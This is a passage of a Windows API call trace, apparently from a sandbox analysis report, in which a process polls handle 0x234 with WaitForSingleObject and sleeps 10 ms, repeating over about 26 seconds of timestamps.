0x102 [0172.787] Sleep (dwMilliseconds=0xa) [0173.010] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0173.010] Sleep (dwMilliseconds=0xa) [0173.133] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0173.133] Sleep (dwMilliseconds=0xa) [0173.488] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0173.488] Sleep (dwMilliseconds=0xa) [0173.637] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0173.637] Sleep (dwMilliseconds=0xa) [0173.824] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0173.824] Sleep (dwMilliseconds=0xa) [0173.965] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0173.965] Sleep (dwMilliseconds=0xa) [0174.069] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.070] Sleep (dwMilliseconds=0xa) [0174.209] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.209] Sleep (dwMilliseconds=0xa) [0174.360] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.360] Sleep (dwMilliseconds=0xa) [0174.501] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.501] Sleep (dwMilliseconds=0xa) [0174.743] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.743] Sleep (dwMilliseconds=0xa) [0174.818] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.818] Sleep (dwMilliseconds=0xa) [0174.916] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.916] Sleep (dwMilliseconds=0xa) [0174.996] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0174.996] Sleep (dwMilliseconds=0xa) [0175.111] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.111] Sleep (dwMilliseconds=0xa) [0175.232] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.232] Sleep (dwMilliseconds=0xa) [0175.418] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.418] Sleep (dwMilliseconds=0xa) [0175.603] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.603] Sleep (dwMilliseconds=0xa) [0175.774] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.774] Sleep (dwMilliseconds=0xa) [0175.911] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.912] Sleep (dwMilliseconds=0xa) [0175.982] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0175.982] Sleep (dwMilliseconds=0xa) [0176.064] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0176.064] Sleep (dwMilliseconds=0xa) [0176.162] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0176.164] Sleep (dwMilliseconds=0xa) [0176.262] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0176.262] Sleep (dwMilliseconds=0xa) [0176.439] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0176.439] Sleep (dwMilliseconds=0xa) [0176.824] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0176.824] Sleep (dwMilliseconds=0xa) [0176.929] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0176.929] Sleep (dwMilliseconds=0xa) [0177.174] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0177.174] Sleep (dwMilliseconds=0xa) [0177.306] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0177.307] Sleep (dwMilliseconds=0xa) [0177.580] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0177.580] Sleep (dwMilliseconds=0xa) [0177.761] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0177.761] Sleep (dwMilliseconds=0xa) [0177.884] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0177.884] Sleep (dwMilliseconds=0xa) [0177.977] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0177.977] Sleep (dwMilliseconds=0xa) [0178.076] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.076] Sleep (dwMilliseconds=0xa) [0178.207] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.207] Sleep (dwMilliseconds=0xa) [0178.317] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.318] Sleep (dwMilliseconds=0xa) [0178.423] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.423] Sleep (dwMilliseconds=0xa) [0178.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.543] Sleep (dwMilliseconds=0xa) [0178.630] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.630] Sleep (dwMilliseconds=0xa) [0178.751] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.751] Sleep (dwMilliseconds=0xa) [0178.841] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.841] Sleep (dwMilliseconds=0xa) [0178.920] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0178.920] Sleep (dwMilliseconds=0xa) [0179.032] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.032] Sleep (dwMilliseconds=0xa) [0179.107] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.107] Sleep (dwMilliseconds=0xa) [0179.194] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.194] Sleep (dwMilliseconds=0xa) [0179.318] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.318] Sleep (dwMilliseconds=0xa) [0179.404] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.414] Sleep (dwMilliseconds=0xa) [0179.566] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.566] Sleep (dwMilliseconds=0xa) [0179.725] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.725] Sleep (dwMilliseconds=0xa) [0179.839] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.839] Sleep (dwMilliseconds=0xa) [0179.909] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0179.910] Sleep (dwMilliseconds=0xa) [0180.017] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.017] Sleep (dwMilliseconds=0xa) [0180.095] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.095] Sleep (dwMilliseconds=0xa) [0180.181] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.181] Sleep (dwMilliseconds=0xa) [0180.231] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.231] Sleep (dwMilliseconds=0xa) [0180.322] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.323] Sleep (dwMilliseconds=0xa) [0180.381] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.381] Sleep (dwMilliseconds=0xa) [0180.415] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.415] Sleep (dwMilliseconds=0xa) [0180.451] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.451] Sleep (dwMilliseconds=0xa) [0180.485] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.486] Sleep (dwMilliseconds=0xa) [0180.536] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.536] Sleep (dwMilliseconds=0xa) [0180.608] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.608] Sleep (dwMilliseconds=0xa) [0180.652] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.652] Sleep (dwMilliseconds=0xa) [0180.777] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.778] Sleep (dwMilliseconds=0xa) [0180.879] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.879] Sleep (dwMilliseconds=0xa) [0180.968] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0180.968] Sleep (dwMilliseconds=0xa) [0181.044] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.044] Sleep (dwMilliseconds=0xa) [0181.203] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.203] Sleep (dwMilliseconds=0xa) [0181.287] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.287] Sleep (dwMilliseconds=0xa) [0181.359] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.359] Sleep (dwMilliseconds=0xa) [0181.501] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.501] Sleep (dwMilliseconds=0xa) [0181.595] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.595] Sleep (dwMilliseconds=0xa) [0181.713] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.713] Sleep (dwMilliseconds=0xa) [0181.775] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.775] Sleep (dwMilliseconds=0xa) [0181.837] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.837] Sleep (dwMilliseconds=0xa) [0181.949] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0181.949] Sleep (dwMilliseconds=0xa) [0182.185] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0182.185] Sleep (dwMilliseconds=0xa) [0182.265] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0182.265] Sleep (dwMilliseconds=0xa) [0182.446] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0182.446] Sleep (dwMilliseconds=0xa) [0182.613] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0182.613] Sleep (dwMilliseconds=0xa) [0182.859] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0182.859] Sleep (dwMilliseconds=0xa) [0182.963] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0182.963] Sleep (dwMilliseconds=0xa) [0183.100] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0183.100] Sleep (dwMilliseconds=0xa) [0183.223] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0183.223] Sleep (dwMilliseconds=0xa) [0183.332] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0183.332] Sleep (dwMilliseconds=0xa) [0183.440] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0183.440] Sleep (dwMilliseconds=0xa) [0183.529] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0183.529] Sleep (dwMilliseconds=0xa) [0183.913] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0183.913] Sleep (dwMilliseconds=0xa) [0184.024] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.024] Sleep (dwMilliseconds=0xa) [0184.083] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.083] Sleep (dwMilliseconds=0xa) [0184.180] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.180] Sleep (dwMilliseconds=0xa) [0184.249] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.249] Sleep (dwMilliseconds=0xa) [0184.346] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.346] Sleep (dwMilliseconds=0xa) [0184.489] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.489] Sleep (dwMilliseconds=0xa) [0184.597] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.597] Sleep (dwMilliseconds=0xa) [0184.673] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.674] Sleep (dwMilliseconds=0xa) [0184.875] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0184.875] Sleep (dwMilliseconds=0xa) [0185.020] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.020] Sleep (dwMilliseconds=0xa) [0185.135] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.135] Sleep (dwMilliseconds=0xa) [0185.305] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.305] Sleep (dwMilliseconds=0xa) [0185.384] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.384] Sleep (dwMilliseconds=0xa) [0185.535] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.535] Sleep (dwMilliseconds=0xa) [0185.609] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.609] Sleep (dwMilliseconds=0xa) [0185.741] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.741] Sleep (dwMilliseconds=0xa) [0185.852] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.852] Sleep (dwMilliseconds=0xa) [0185.935] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0185.935] Sleep (dwMilliseconds=0xa) [0186.022] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.023] Sleep (dwMilliseconds=0xa) [0186.159] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.159] Sleep (dwMilliseconds=0xa) [0186.279] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.279] Sleep (dwMilliseconds=0xa) [0186.376] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.376] Sleep (dwMilliseconds=0xa) [0186.579] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.579] Sleep (dwMilliseconds=0xa) [0186.662] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.662] Sleep (dwMilliseconds=0xa) [0186.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.789] Sleep (dwMilliseconds=0xa) [0186.999] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0186.999] Sleep (dwMilliseconds=0xa) [0187.163] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.163] Sleep (dwMilliseconds=0xa) [0187.236] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.236] Sleep (dwMilliseconds=0xa) [0187.289] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.290] Sleep (dwMilliseconds=0xa) [0187.354] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.354] Sleep (dwMilliseconds=0xa) [0187.444] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.444] Sleep (dwMilliseconds=0xa) [0187.573] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.573] Sleep (dwMilliseconds=0xa) [0187.631] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.632] Sleep (dwMilliseconds=0xa) [0187.699] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.699] Sleep (dwMilliseconds=0xa) [0187.859] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.859] Sleep (dwMilliseconds=0xa) [0187.977] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0187.977] Sleep (dwMilliseconds=0xa) [0188.058] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.059] Sleep (dwMilliseconds=0xa) [0188.172] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.172] Sleep (dwMilliseconds=0xa) [0188.248] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.248] Sleep (dwMilliseconds=0xa) [0188.364] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.364] Sleep (dwMilliseconds=0xa) [0188.480] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.480] Sleep (dwMilliseconds=0xa) [0188.590] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.590] Sleep (dwMilliseconds=0xa) [0188.935] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0188.935] Sleep (dwMilliseconds=0xa) [0189.057] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.057] Sleep (dwMilliseconds=0xa) [0189.170] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.170] Sleep (dwMilliseconds=0xa) [0189.232] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.232] Sleep (dwMilliseconds=0xa) [0189.304] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.304] Sleep (dwMilliseconds=0xa) [0189.375] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.375] Sleep (dwMilliseconds=0xa) [0189.468] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.468] Sleep (dwMilliseconds=0xa) [0189.508] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.508] Sleep (dwMilliseconds=0xa) [0189.555] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.555] Sleep (dwMilliseconds=0xa) [0189.591] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.592] Sleep (dwMilliseconds=0xa) [0189.634] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.634] Sleep (dwMilliseconds=0xa) [0189.685] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.685] Sleep (dwMilliseconds=0xa) [0189.736] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.737] Sleep (dwMilliseconds=0xa) [0189.833] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.833] Sleep (dwMilliseconds=0xa) [0189.902] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.902] Sleep (dwMilliseconds=0xa) [0189.930] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0189.930] Sleep (dwMilliseconds=0xa) [0190.030] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.030] Sleep (dwMilliseconds=0xa) [0190.118] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.118] Sleep (dwMilliseconds=0xa) [0190.214] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.214] Sleep (dwMilliseconds=0xa) [0190.300] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.300] Sleep (dwMilliseconds=0xa) [0190.416] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.417] Sleep (dwMilliseconds=0xa) [0190.513] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.513] Sleep (dwMilliseconds=0xa) [0190.584] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.584] Sleep (dwMilliseconds=0xa) [0190.690] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.690] Sleep (dwMilliseconds=0xa) [0190.765] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.765] Sleep (dwMilliseconds=0xa) [0190.960] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0190.960] Sleep (dwMilliseconds=0xa) [0191.088] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.088] Sleep (dwMilliseconds=0xa) [0191.191] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.191] Sleep (dwMilliseconds=0xa) [0191.264] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.264] Sleep (dwMilliseconds=0xa) [0191.344] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.344] Sleep (dwMilliseconds=0xa) [0191.416] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.416] Sleep (dwMilliseconds=0xa) [0191.500] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.500] Sleep (dwMilliseconds=0xa) [0191.604] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.604] Sleep (dwMilliseconds=0xa) [0191.714] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.714] Sleep (dwMilliseconds=0xa) [0191.895] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.895] Sleep (dwMilliseconds=0xa) [0191.989] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0191.989] Sleep (dwMilliseconds=0xa) [0192.067] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.067] Sleep (dwMilliseconds=0xa) [0192.179] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.179] Sleep (dwMilliseconds=0xa) [0192.268] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.268] Sleep (dwMilliseconds=0xa) [0192.511] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.511] Sleep (dwMilliseconds=0xa) [0192.644] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.644] Sleep (dwMilliseconds=0xa) [0192.715] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.715] Sleep (dwMilliseconds=0xa) [0192.935] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0192.935] Sleep (dwMilliseconds=0xa) [0193.026] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.026] Sleep (dwMilliseconds=0xa) [0193.094] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.094] Sleep (dwMilliseconds=0xa) [0193.192] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.193] Sleep (dwMilliseconds=0xa) [0193.234] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.234] Sleep (dwMilliseconds=0xa) [0193.280] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.280] Sleep (dwMilliseconds=0xa) [0193.394] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.394] Sleep (dwMilliseconds=0xa) [0193.491] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.492] Sleep (dwMilliseconds=0xa) [0193.589] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0193.589] Sleep (dwMilliseconds=0xa) [0194.052] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.052] Sleep (dwMilliseconds=0xa) [0194.201] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.201] Sleep (dwMilliseconds=0xa) [0194.281] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.281] Sleep (dwMilliseconds=0xa) [0194.378] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.378] Sleep (dwMilliseconds=0xa) [0194.500] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.500] Sleep (dwMilliseconds=0xa) [0194.660] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.660] Sleep (dwMilliseconds=0xa) [0194.749] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.749] Sleep (dwMilliseconds=0xa) [0194.936] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0194.936] Sleep (dwMilliseconds=0xa) [0195.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.018] Sleep (dwMilliseconds=0xa) [0195.133] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.133] Sleep (dwMilliseconds=0xa) [0195.234] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.234] Sleep (dwMilliseconds=0xa) [0195.347] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.347] Sleep (dwMilliseconds=0xa) [0195.430] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.431] Sleep (dwMilliseconds=0xa) [0195.517] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.517] Sleep (dwMilliseconds=0xa) [0195.694] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.694] Sleep (dwMilliseconds=0xa) [0195.823] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.823] Sleep (dwMilliseconds=0xa) [0195.924] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0195.924] Sleep (dwMilliseconds=0xa) [0197.535] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0197.536] Sleep (dwMilliseconds=0xa) [0197.620] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0197.620] Sleep (dwMilliseconds=0xa) [0197.700] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0197.700] Sleep (dwMilliseconds=0xa) [0197.766] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0197.766] Sleep (dwMilliseconds=0xa) [0197.900] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0197.900] Sleep (dwMilliseconds=0xa) [0197.958] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0197.958] Sleep (dwMilliseconds=0xa) [0198.007] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.007] Sleep (dwMilliseconds=0xa) [0198.057] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.057] Sleep (dwMilliseconds=0xa) [0198.097] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.097] Sleep (dwMilliseconds=0xa) [0198.166] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.166] Sleep (dwMilliseconds=0xa) [0198.203] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.203] Sleep (dwMilliseconds=0xa) [0198.252] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.252] Sleep (dwMilliseconds=0xa) [0198.302] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.302] Sleep (dwMilliseconds=0xa) [0198.386] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.386] Sleep (dwMilliseconds=0xa) [0198.457] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.457] Sleep (dwMilliseconds=0xa) [0198.512] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.512] Sleep (dwMilliseconds=0xa) [0198.580] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.580] Sleep (dwMilliseconds=0xa) [0198.693] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.693] Sleep (dwMilliseconds=0xa) [0198.750] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0198.750] Sleep 